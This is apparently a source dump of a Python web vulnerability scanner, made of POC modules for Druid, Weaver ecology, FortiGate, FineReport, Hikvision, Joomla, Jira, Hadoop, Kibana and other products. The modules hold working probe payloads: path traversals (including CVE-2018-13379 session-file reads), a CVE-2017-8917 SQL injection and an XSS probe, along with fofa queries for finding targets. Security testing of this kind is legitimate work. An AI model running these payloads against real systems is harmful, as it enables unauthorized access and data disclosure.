"url": parser_.geturl(), 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/druid/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/druid/poc_druid-monitor-unauth_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-10 3 | # @Author : caicai 4 | # @File : poc_druid-monitor-unauth_2019.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "druid-monitor-unauth" 18 | self.vulmsg = "referer: https://github.com/alibaba/druid" 19 | self.level = 3 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "druid/index.html", 29 | "headers": self.dictdata.get("request").get("headers"), 30 | "timeout": 10, 31 | "verify": False, 32 | "allow_redirects": False 33 | } 34 | r = request(**req) 35 | if r != None and r.status_code == 200 and b"Druid Stat Index" in r.content and b"DruidVersion" in r.content and b"DruidDrivers" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": parser_.geturl(), 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/drupal/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/ecology/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/ecology/poc_ecology-filedownload-directory-traversal_2018.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-24 3 | # @Author : caicai 4 | # @File : poc_ecology-filedownload-directory-traversal_2018.py 5 | 6 | '''fofa :header="ecology_JSessionId" ''' 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "ecology-filedownload-directory-traversal" 18 | self.vulmsg = "任意文件下载,referer:https://www.weaver.com.cn/cs/securityDownload.asp" 19 | self.level = 3 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml", 28 | "timeout": 10, 29 | "allow_redirects": False, 30 | "verify": False, 31 | } 32 | r = request(**req) 33 | if r != None and r.status_code == 200 and b"/weaver/" in r.content: 34 | parser_ = response_parser(r) 35 | self.result.append({ 36 | "name": self.name, 37 | "url": parser_.geturl(), 38 | "level": self.level, # 0:Low 1:Medium 2:High 39 | "detail": { 40 | "vulmsg": self.vulmsg, 41 | "request": parser_.getrequestraw(), 42 | "response": parser_.getresponseraw() 43 | } 44 | }) 45 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/ecology/poc_ecology-springframework-directory-traversal_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-24 3 | # @Author : caicai 4 | # @File : poc_ecology-springframework-directory-traversal_2019.py 5 | 6 | '''fofa :header="ecology_JSessionId" ''' 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "ecology-springframework-directory-traversal" 18 | self.vulmsg = "referer:https://www.weaver.com.cn/cs/securityDownload.asp" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml", 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | if r != None and r.status_code == 200 and b"/weaver/" in r.content: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": parser_.geturl(), 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/ecshop/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/elasticsearch/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/elasticsearch/poc_elasticsearch-unauth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_elasticsearch-unauth.py 5 | 6 | 7 | 8 | # 此脚本为编写perfloder的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 9 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 10 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 11 | from myscan.config import scan_set 12 | 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "elasticsearch-unauth" 21 | self.vulmsg = "未授权访问" 22 | self.level = 2 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | # 根据config.py 配置的深度,限定一下目录深度 26 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 27 | return 28 | req = { 29 | "method": "GET", 30 | "url": self.url, 31 | "headers":self.dictdata.get("request").get("headers"), 32 | "timeout": 10, 33 | "allow_redirects": False, 34 | "verify": False, 35 | } 36 | r = request(**req) 37 | if r != None and r.status_code == 200 and "json" in r.headers.get("Content-Type","") and b"You Know, for Search" in r.content: 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": self.url, 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | "vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/f5/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/finecms/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/finereport/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/finereport/poc_finereport-directory-traversal_2019.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_finereport-directory-traversal_2019.py 5 | 6 | '''未验证''' 7 | 8 | # 此脚本为编写perfloder的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 9 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 10 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 11 | from myscan.config import scan_set 12 | 13 | 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "finereport-directory-traversal" 20 | self.vulmsg = "referer:http://foreversong.cn/archives/1378" 21 | self.level = 3 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml", 30 | "headers": self.dictdata.get("request").get("headers"), 31 | "timeout": 10, 32 | "allow_redirects": False, 33 | "verify": False, 34 | } 35 | r = request(**req) 36 | if r != None and r.status_code == 200 and b"" in r.content and b"" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": self.url, 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/fortigate/poc_fortigate_cve-2018-13379_2018.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/11/3 3 | # @Author : caicai 4 | # @File : poc_fortigate_cve-2018-13379_2018.py 5 | ''' 6 | fofa: 7 | "Fortinet" && title=="Please Login" 8 | ''' 9 | 10 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 11 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 12 | from myscan.config import scan_set 13 | 14 | 15 | class POC(): 16 | def __init__(self, workdata): 17 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 18 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 19 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 20 | self.name = "fortigate_cve-2018-13379" 21 | self.vulmsg = "link :https://github.com/milo2012/CVE-2018-13379/blob/master/CVE-2018-13379.py" 22 | self.level = 3 # 0:Low 1:Medium 2:High 23 | 24 | def verify(self): 25 | if self.dictdata.get("url").get("protocol") != "https": 26 | return 27 | # 根据config.py 配置的深度,限定一下目录深度 28 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 29 | return 30 | 31 | req = { 32 | "method": "GET", 33 | "url": self.url + "remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession", 34 | "timeout": 10, 35 | "allow_redirects": False, 36 | "verify": False, 37 | } 38 | r = request(**req) 39 | if r != None and r.status_code == 200 and b"var fgt_lang =" in r.content: 40 | parser_ = response_parser(r) 41 | self.result.append({ 42 | "name": self.name, 43 | "url": self.url, 44 | "level": self.level, # 0:Low 1:Medium 2:High 45 | "detail": { 46 | "vulmsg": self.vulmsg, 47 | "request": parser_.getrequestraw(), 48 | "response": parser_.getresponseraw() 49 | } 50 | }) 51 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/hadoop/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/hadoop/poc_hadoop_unauth_acc_2018.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-03 3 | # @Author : caicai 4 | # @File : poc_hadoop_unauth_acc_2018.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "hadoop unauth access" 17 | self.vulmsg = "referer:https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn" 18 | self.level = 2 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | req = { 25 | "method": "GET", 26 | "url": self.url + "ws/v1/cluster/info", 27 | "headers": { 28 | "Content-Type": "application/json" 29 | }, 30 | "timeout": 10, 31 | "allow_redirects": True, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | 36 | if r != None and r.status_code == 200 and b"resourceManagerVersionBuiltOn" in r.content and b"hadoopVersion" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": req.get("url"), 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/hikvision/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/hikvision/poc_hikvision_xss_2020.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-06-23 3 | # @Author : caicai 4 | # @File : poc_hikvision_xss_2020.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "hikvision_xss" 17 | self.vulmsg = "no detail " 18 | self.level = 1 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | req = { 25 | "url": self.url + "home/licenseUpload.action?errorMsg=xxxxxx", 26 | "method": "GET", 27 | "verify": False, 28 | "timeout": 10, 29 | } 30 | r = request(**req) 31 | if r is not None and b"xxxxxx" in r.content and b'licenseFileName"' in r.content: 32 | parser_ = response_parser(r) 33 | self.result.append({ 34 | "name": self.name, 35 | "url": self.url, 36 | "level": self.level, # 0:Low 1:Medium 2:High 37 | "detail": { 38 | "vulmsg": self.vulmsg, 39 | "request": parser_.getrequestraw(), 40 | "response": parser_.getresponseraw() 41 | } 42 | }) 43 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/iis/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/19 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | 6 | 7 | # 此目录主要是一些提示工作 -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/poc_docker_registry_listing_2019.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/19 3 | # @Author : caicai 4 | # @File : poc_docker_registry_listing_2019.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | from myscan.lib.core.common import get_random_str 10 | 11 | ''' 12 | 未验证 13 | ''' 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "poc_docker_registry_listing_2019" 20 | self.vulmsg = "you can google it " 21 | self.level = 1 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "v2/_catalog", 30 | "timeout": 10, 31 | "allow_redirects": False, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r != None and "application/json" in str(r.headers) and b'"repositories":' in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/poc_front-page-misconfig.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/20 3 | # @Author : caicai 4 | # @File : poc_front-page-misconfig.py 5 | 6 | 7 | 8 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 9 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 10 | from myscan.config import scan_set 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "FrontPage configuration information discloure" 19 | self.vulmsg = "find sensitive msg" 20 | self.level = 1 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | # 根据config.py 配置的深度,限定一下目录深度 24 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 25 | return 26 | req = { 27 | "method": "GET", 28 | "url": self.url + "_vti_inf.html", 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | if r is not None and len(r.content)==247: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": self.url, 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/poc_jira_service-desk-signup.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/20 3 | # @Author : caicai 4 | # @File : poc_jira_service-desk-signup.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "Jira Unauthenticated Projects" 18 | self.vulmsg = "find sensitive msg" 19 | self.level = 1 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "POST", 27 | "url": self.url + "servicedesk/customer/user/signup", 28 | "headers": {"Content-Type": "application/json"}, 29 | "data": '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}', 30 | "timeout": 10, 31 | "allow_redirects": False, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r is not None and r.status_code == 400 and b"signup.validation.errors" in r.content: 36 | parser_ = response_parser(r) 37 | self.result.append({ 38 | "name": self.name, 39 | "url": self.url, 40 | "level": self.level, # 0:Low 1:Medium 2:High 41 | "detail": { 42 | "vulmsg": self.vulmsg, 43 | "request": parser_.getrequestraw(), 44 | "response": parser_.getresponseraw() 45 | } 46 | }) 47 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/info/poc_jira_unauthenticated-projects.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/20 3 | # @Author : caicai 4 | # @File : poc_jira_unauthenticated-projects.py 5 | 6 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 7 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 8 | from myscan.config import scan_set 9 | 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "Jira Unauthenticated Projects" 17 | self.vulmsg = "find sensitive msg" 18 | self.level = 1 # 0:Low 1:Medium 2:High 19 | 20 | def verify(self): 21 | # 根据config.py 配置的深度,限定一下目录深度 22 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 23 | return 24 | req = { 25 | "method": "GET", 26 | "url": self.url + "rest/api/2/project?maxResults=100", 27 | "timeout": 10, 28 | "allow_redirects": False, 29 | "verify": False, 30 | } 31 | r = request(**req) 32 | words = [ 33 | "projects", 34 | "maxResults", 35 | "startAt", 36 | ] 37 | if r != None and all([x.encode() in r.content for x in words]): 38 | parser_ = response_parser(r) 39 | self.result.append({ 40 | "name": self.name, 41 | "url": self.url, 42 | "level": self.level, # 0:Low 1:Medium 2:High 43 | "detail": { 44 | "vulmsg": self.vulmsg, 45 | "request": parser_.getrequestraw(), 46 | "response": parser_.getresponseraw() 47 | } 48 | }) 49 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/jboss/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/jira/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/jolokia/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/17 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/joomla/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/21 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/joomla/poc_joomla-cve-2017-8917-sqli_2017.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_joomla-cve-2017-8917-sqli_2017.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 16 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 17 | self.name = "joomla-cve-2017-8917-sqli" 18 | self.vulmsg = "referer : https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917" 19 | self.level = 2 # 0:Low 1:Medium 2:High 20 | 21 | def verify(self): 22 | # 根据config.py 配置的深度,限定一下目录深度 23 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 24 | return 25 | req = { 26 | "method": "GET", 27 | "url": self.url + "index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)", 28 | "headers": self.dictdata.get("request").get("headers"), 29 | "timeout": 10, 30 | "allow_redirects": False, 31 | "verify": False, 32 | } 33 | r = request(**req) 34 | if r != None and r.status_code == 500 and b"cf79ae6addba60ad018347359bd144d2" in r.content: 35 | parser_ = response_parser(r) 36 | self.result.append({ 37 | "name": self.name, 38 | "url": self.url, 39 | "level": self.level, # 0:Low 1:Medium 2:High 40 | "detail": { 41 | "vulmsg": self.vulmsg, 42 | "request": parser_.getrequestraw(), 43 | "response": parser_.getresponseraw() 44 | } 45 | }) 46 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/kibana/poc_kibana-unauth_2018.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-11 3 | # @Author : caicai 4 | # @File : poc_kibana-unauth_2018.py 5 | 6 | 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.config import scan_set 10 | 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "kibana-unauth" 19 | self.vulmsg = "未授权访问" 20 | self.level = 2 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | # 根据config.py 配置的深度,限定一下目录深度 24 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 25 | return 26 | req = { 27 | "method": "GET", 28 | "url": self.url+"app/kibana", 29 | "headers":self.dictdata.get("request").get("headers"), 30 | "timeout": 10, 31 | "allow_redirects": False, 32 | "verify": False, 33 | } 34 | r = request(**req) 35 | if r != None and r.status_code == 200 and b".kibanaWelcomeView" in r.content: 36 | parser_ = 